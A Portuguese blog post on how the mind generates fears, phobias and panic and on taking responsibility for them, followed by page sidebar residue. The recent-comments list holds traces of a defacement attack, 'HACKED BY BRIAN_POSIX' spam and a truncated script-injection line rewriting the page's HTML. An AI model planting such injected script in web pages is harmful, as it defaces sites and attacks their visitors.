Ousar Ser @ 18:34

Sex, 01/06/12

Nos tempos que correm, caracterizados por um super-desenvolvimento tecnológico, a mente tem sido híper inflacionada em detrimento dos outros instrumentos de conhecimento que possuímos, como a intuição e os órgãos dos sentidos, incorrendo o risco de escravizar vidas, gerando vários tipos de medos, tais como: o medo de falhar, o medo de desagradar, o medo das doenças, o medo do que se perdeu, etc…

Este aspecto pervertido da nossa mente leva a que a pessoa perca a capacidade para realizar a sua plena vitalidade, no exercício da sua humanidade no aqui e agora –espaço em que a vida, de facto, se passa.

Como ajudar as nossas crianças - e nós próprios - a viver a vida em vez de temer a vida? Devemos apostar na prevenção das cada vez mais frequentes depressões associadas a ataques de pânico, sempre com a cabeça a imaginar perigos que levam a pessoa a duvidar do poder que tem sobre si própria, e da sua capacidade de ser responsável pelas reacções às suas emoções.

O pensamento nasce com a gradual separação do bebé e da mãe, na sua relação simbiótica após o nascimento. Ao longo da vida, todo o crescimento implica uma perda e traz um enriquecimento. Vai-se adquirindo “conhecimento” através da relação perda/ganho para se ir construindo o pensamento, e a brincar vai-se aprendendo a pensar cada vez mais ricamente, ligando umas coisas às outras.

A mente é portanto um instrumento de conhecimento do nosso ser. Como pode então acontecer que por vezes as coisas pareçam inverter-se e fica o nosso ser um instrumento da nossa mente? Os medos, mais ainda as fobias, são disso um exemplo. No entanto, se é verdade que os medos são criados pela nossa mente, também o é que a mente tem capacidade para os resolver e libertar a pessoa desses medos. Assim a mente mente, porque às vezes inventa – e parece verdade – que a pessoa não é responsável pelos seus medos, pelos seus sucessos, pelos seus desesperos e pelas suas esperanças. É essa a grande mentira da mente!

 

Vamos desmascarar esta mentira da mente para vivermos em saúde! Não perca!



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO